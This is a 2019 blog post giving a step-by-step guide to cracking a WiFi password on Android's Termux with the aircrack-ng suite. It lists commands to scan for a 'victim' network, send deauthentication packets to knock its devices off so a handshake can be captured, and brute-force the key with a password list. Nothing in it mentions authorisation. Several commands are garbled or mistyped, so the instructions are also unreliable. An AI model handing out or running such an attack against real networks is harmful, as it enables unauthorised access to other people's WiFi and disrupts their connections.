Wednesday 21 August 2019

How To Hack Wifi Using Termux [Termux WiFi hack commands list]















How To Hack Wifi Using Termux

There is one software called “aircrack-ng” which you need to first download using Google’s help. Then follow the steps given below:

First connect your wife-adapter to your device :

1) Friends first open Your Gnu Root Debian terminal or root terminal and start the monitor mode by typing these commands :

airmon-ng airmon-ng start wlan01

2) Now start the network detecting by typing this command :

airodump-ng wlan0mon

Here you see your target device and stop the detecting by control + z.

3) Now create one folder and name it cap on your desktop or sd card and also create a password list to brute force the WiFi handshake ,collect the information about victim and create the password list for brute force.

4) Copy victim’s BSSID and also note the target channel CH number and type this command :

airodump-ng -c 6 --bssid00:26:44:AB:C5:C0 -w /root/Desktop/cap/ wlan0mon-w

There you must give the cap folder path if your created this cap folder on sdcard then you can give this path : -w /sdcard/cap/ wlan0mon

5) Now open another terminal and disconnect all devices with this command and capture a wifi handshake type same command but use here target bssid :

aireeplay-ng -0 5 -a 00:26:44:AB:C5:C0 -wlan0mon

now stop attack by control+z and close the terminal

6) now paste the password list in your cap folder and also go into the cap folder directory

Now crack with this command :

aircrack-ng -w pass.list 01.cap

7) this is a brute force attack if any password match to the handshake then it will be cracked.and you get the key (means passwords)

No comments:

Disqus Shortname

designcart

Comments System

Disqus Shortname

Comments system

[blogger][disqus][facebook]

What's New

slide

Instagram